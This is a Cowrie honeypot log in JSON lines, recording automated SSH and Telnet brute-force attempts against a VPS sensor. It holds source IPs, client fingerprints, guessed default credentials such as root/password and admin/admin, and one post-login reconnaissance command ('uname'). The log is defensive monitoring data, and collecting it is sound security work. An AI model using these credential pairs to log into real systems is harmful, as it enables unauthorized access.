{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:44:42.856029Z","src_ip":"185.93.89.7","session":"66534e044f6e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40900,"dst_ip":"1.2.3.4","dst_port":22,"session":"503ab4dbf92a","protocol":"ssh","message":"New connection: 51.79.164.132:40900 (1.2.3.4:22) [session: 503ab4dbf92a]","sensor":"my-vps","timestamp":"2025-08-28T08:45:00.805876Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:45:00.898308Z","src_ip":"51.79.164.132","session":"503ab4dbf92a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:45:01.568801Z","src_ip":"51.79.164.132","session":"503ab4dbf92a"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-28T08:45:03.023022Z","src_ip":"51.79.164.132","session":"503ab4dbf92a"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:45:04.842741Z","src_ip":"51.79.164.132","session":"503ab4dbf92a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":52384,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea47dc7d747e","protocol":"ssh","message":"New connection: 185.93.89.7:52384 (1.2.3.4:22) [session: ea47dc7d747e]","sensor":"my-vps","timestamp":"2025-08-28T08:45:21.936091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:45:21.941362Z","src_ip":"185.93.89.7","session":"ea47dc7d747e"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:45:21.959079Z","src_ip":"185.93.89.7","session":"ea47dc7d747e"}
{"eventid":"cowrie.login.success","username":"root","password":"index1234@","message":"login attempt [root/index1234@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:45:22.017682Z","src_ip":"185.93.89.7","session":"ea47dc7d747e"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:45:22.037504Z","src_ip":"185.93.89.7","session":"ea47dc7d747e"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56338,"dst_ip":"1.2.3.4","dst_port":22,"session":"220f251c97af","protocol":"ssh","message":"New connection: 51.79.164.132:56338 (1.2.3.4:22) [session: 220f251c97af]","sensor":"my-vps","timestamp":"2025-08-28T08:45:28.483151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:45:28.691525Z","src_ip":"51.79.164.132","session":"220f251c97af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:45:28.692350Z","src_ip":"51.79.164.132","session":"220f251c97af"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-28T08:45:30.577694Z","src_ip":"51.79.164.132","session":"220f251c97af"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":41420,"dst_ip":"1.2.3.4","dst_port":22,"session":"f384f8ed8f04","protocol":"ssh","message":"New connection: 185.93.89.7:41420 (1.2.3.4:22) [session: f384f8ed8f04]","sensor":"my-vps","timestamp":"2025-08-28T08:45:31.860471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:45:31.876563Z","src_ip":"185.93.89.7","session":"f384f8ed8f04"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:45:31.899253Z","src_ip":"185.93.89.7","session":"f384f8ed8f04"}
{"eventid":"cowrie.login.success","username":"root","password":"Index1234@","message":"login attempt [root/Index1234@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:45:31.973982Z","src_ip":"185.93.89.7","session":"f384f8ed8f04"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:45:31.986695Z","src_ip":"51.79.164.132","session":"220f251c97af"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:45:32.006781Z","src_ip":"185.93.89.7","session":"f384f8ed8f04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45460,"dst_ip":"1.2.3.4","dst_port":23,"session":"1e181fb1993f","protocol":"telnet","message":"New connection: 212.227.125.160:45460 (1.2.3.4:23) [session: 1e181fb1993f]","sensor":"my-vps","timestamp":"2025-08-28T08:45:53.036244Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T08:45:53.780232Z","src_ip":"212.227.125.160","session":"1e181fb1993f"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49848,"dst_ip":"1.2.3.4","dst_port":22,"session":"14e2ca9c82fd","protocol":"ssh","message":"New connection: 51.79.164.132:49848 (1.2.3.4:22) [session: 14e2ca9c82fd]","sensor":"my-vps","timestamp":"2025-08-28T08:45:54.875376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:45:55.309515Z","src_ip":"51.79.164.132","session":"14e2ca9c82fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:45:55.310195Z","src_ip":"51.79.164.132","session":"14e2ca9c82fd"}
{"eventid":"cowrie.session.closed","duration":2.927891969680786,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:45:55.964067Z","src_ip":"212.227.125.160","session":"1e181fb1993f"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:45:58.135485Z","src_ip":"51.79.164.132","session":"14e2ca9c82fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47900,"dst_ip":"1.2.3.4","dst_port":23,"session":"d66d910c3da7","protocol":"telnet","message":"New connection: 212.227.125.160:47900 (1.2.3.4:23) [session: d66d910c3da7]","sensor":"my-vps","timestamp":"2025-08-28T08:45:58.336288Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:45:59.450975Z","src_ip":"51.79.164.132","session":"14e2ca9c82fd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:45:59.451748Z","src_ip":"51.79.164.132","session":"14e2ca9c82fd"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:45:59.454005Z","src_ip":"212.227.125.160","session":"d66d910c3da7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:45:59.636264Z","src_ip":"51.79.164.132","session":"14e2ca9c82fd"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:45:59.637241Z","src_ip":"51.79.164.132","session":"14e2ca9c82fd"}
{"eventid":"cowrie.session.closed","duration":2.8748536109924316,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:01.211064Z","src_ip":"212.227.125.160","session":"d66d910c3da7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53510,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c349b29ef7e","protocol":"telnet","message":"New connection: 212.227.125.160:53510 (1.2.3.4:23) [session: 2c349b29ef7e]","sensor":"my-vps","timestamp":"2025-08-28T08:46:03.553590Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-28T08:46:04.279514Z","src_ip":"212.227.125.160","session":"2c349b29ef7e"}
{"eventid":"cowrie.session.closed","duration":2.901092052459717,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:06.454608Z","src_ip":"212.227.125.160","session":"2c349b29ef7e"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48126,"dst_ip":"1.2.3.4","dst_port":22,"session":"0da1ced81c95","protocol":"ssh","message":"New connection: 185.93.89.7:48126 (1.2.3.4:22) [session: 0da1ced81c95]","sensor":"my-vps","timestamp":"2025-08-28T08:46:07.763376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:46:07.771002Z","src_ip":"185.93.89.7","session":"0da1ced81c95"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:46:07.792430Z","src_ip":"185.93.89.7","session":"0da1ced81c95"}
{"eventid":"cowrie.login.success","username":"root","password":"index@1234","message":"login attempt [root/index@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:46:07.862283Z","src_ip":"185.93.89.7","session":"0da1ced81c95"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:07.883888Z","src_ip":"185.93.89.7","session":"0da1ced81c95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53536,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed277907d579","protocol":"telnet","message":"New connection: 212.227.125.160:53536 (1.2.3.4:23) [session: ed277907d579]","sensor":"my-vps","timestamp":"2025-08-28T08:46:07.907821Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58888,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ed5fedb3f36","protocol":"ssh","message":"New connection: 212.227.235.229:58888 (1.2.3.4:22) [session: 9ed5fedb3f36]","sensor":"my-vps","timestamp":"2025-08-28T08:46:08.072806Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T08:46:08.746600Z","src_ip":"212.227.125.160","session":"ed277907d579"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:46:10.475669Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T08:46:10.476436Z","src_ip":"212.227.235.229","session":"9ed5fedb3f36"}
{"eventid":"cowrie.session.closed","duration":3.240776777267456,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:11.148528Z","src_ip":"212.227.125.160","session":"ed277907d579"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53540,"dst_ip":"1.2.3.4","dst_port":23,"session":"16e6582f5fb4","protocol":"telnet","message":"New connection: 212.227.125.160:53540 (1.2.3.4:23) [session: 16e6582f5fb4]","sensor":"my-vps","timestamp":"2025-08-28T08:46:11.538617Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"","message":"login attempt [admin/] failed","sensor":"my-vps","timestamp":"2025-08-28T08:46:12.404760Z","src_ip":"212.227.125.160","session":"16e6582f5fb4"}
{"eventid":"cowrie.session.closed","duration":3.259098768234253,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:46:14.797642Z","src_ip":"212.227.125.160","session":"16e6582f5fb4"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57472,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8cdd11457b7","protocol":"ssh","message":"New connection: 185.93.89.7:57472 (1.2.3.4:22) [session: b8cdd11457b7]","sensor":"my-vps","timestamp":"2025-08-28T08:46:16.481989Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:46:16.483343Z","src_ip":"185.93.89.7","session":"b8cdd11457b7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:46:16.501863Z","src_ip":"185.93.89.7","session":"b8cdd11457b7"}
